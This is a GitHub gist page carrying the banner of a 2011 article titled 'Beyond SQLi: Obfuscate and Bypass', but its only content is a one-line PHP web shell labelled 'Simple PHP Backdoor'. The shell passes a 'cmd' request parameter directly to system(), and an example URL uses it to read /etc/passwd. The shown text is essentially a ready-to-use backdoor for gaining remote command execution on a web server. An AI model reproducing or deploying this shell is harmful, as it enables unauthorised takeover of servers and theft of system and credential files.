Skip to content

Instantly share code, notes, and snippets.

View Am0stafa's full-sized avatar

0xchaos Am0stafa

View GitHub Profile
@cyberheartmi9
cyberheartmi9 / gist:b4a4ff0f691be6b5c866450563258e86
Created April 4, 2018 08:40
Beyond SQLi: Obfuscate and Bypas
|=--------------------------------------------------------------------=|
|=--------------=[ Beyond SQLi: Obfuscate and Bypass ]=---------------=|
|=-------------------------=[ 6 October 2011 ]=-----------------------=|
|=----------------------=[ By CWH Underground ]=--------------------=|
|=--------------------------------------------------------------------=|
######
Info
######
<!-- Simple PHP Backdoor By DK (One-Liner Version) -->
<!-- Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd -->
<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>